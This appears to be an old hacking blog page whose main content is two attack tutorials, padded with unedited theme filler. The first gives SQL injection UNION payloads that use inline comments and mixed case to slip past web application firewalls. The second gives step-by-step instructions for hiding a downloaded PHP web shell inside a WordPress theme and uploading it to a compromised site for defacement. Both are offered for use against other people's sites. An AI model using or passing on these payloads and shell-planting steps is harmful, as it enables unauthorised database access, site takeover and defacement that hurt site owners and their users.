Dear Readers: PWNSCAR is planning to publish a monthly Tech Magazine along with some other blogs. To Contribute CHECK DETAILS

This is default featured slide 1 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

This is default featured slide 2 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

This is default featured slide 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

This is default featured slide 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

ITS ALL ABOUT TECHNOLOGY

You will be left behind the race if you are lacking in technology. You wont be able to survive with respect. So lets learn a bit about technology. Shall we !

ABOUT ME

Showing posts with label aiteraaz. Show all posts
Showing posts with label aiteraaz. Show all posts

14 Apr 2012

How to bypass http forbidden & http not acceptable in sql injection


SQL WAF :- SQL ” WAF ” is a Web Application Firewall which protects the site from malicious scripts injected by the hacker to the victims site. It don’t allow scripts to execute and shows the Error ” HTTP FORBIDDEN ” & ” HTTP NOT ACCEPTABLE ” .

So today we will learn how to bypass WAF :-

BY adding special characters to the query

Normal query :- www.vulnerable-site.com/index.php?id=-12 UNION SELECT ALL 1,2,3,4,5–

Bypass query :- www.vulnerable-site.com/index.php?id=-12 /*!UNION*/ +/*!ALL*/+/*!SELECT*/+1,2,3,4,5—

Second way to bypass it :-

By adding Capital letters at first and last :-

Normal query :- www.vulnerable-site.com/index.php?id=-12 UNION SELECT ALL 1,2,3,4,5–

Bypass query :- www.vulnerable-site.com/index.php?id=-12 UNIunionON SEselectLECT 1,2,3,4,5–

Third Way to bypass it :-

BY making the query Capital + small letters combination :-

Normal Query :- www.vulnerable-site.com/index.php?id=-12 UNION SELECT ALL 1,2,3,4,5–

Bypass query :- http://vulnerablesite.com/detail.php?id=-1 uNiOn SeLeCt 1,2,3,4,5—

Hope you have love the tutorial How to bypass WAF ;)

UPLOADING SHELL IN WORDPRESS

WordPress :- It is a free website building site and used by the most bloggers. It has many features and plugins. It is quite easy to use.
There are many vulnerabilities and exploits for hacking WordPress sites but mine favorite method is Symlink .When you got the access to the wordpress site. You think how to deface it.. and how to upload shell in the wordpress site.
So here’s the easy way to upload shell in the WordPress sites.
Things you require
Download shell from http://sh3ll.org/ ( any php shell ) .
After downloading any theme. It will be in .rar format open it and paste your shell in the theme. ( You can simply drag & drop the shell in the theme when it is open in the win rar ).
So lets start the Hacking
  • First of all login to the site and go to the Appearance column in the left.
  • Now go to the Themes and click on Install themes
  • After that Click on Upload. Select the your theme. ( Uploaded shell theme ) and upload the theme.
Now shell has been uploaded in the site with the Theme.
Your shell link will be www.site.com/wp-content/themes/themename/shellname.php .
Hope this tutorial will be helpful for you :) and don’t forget to share it :D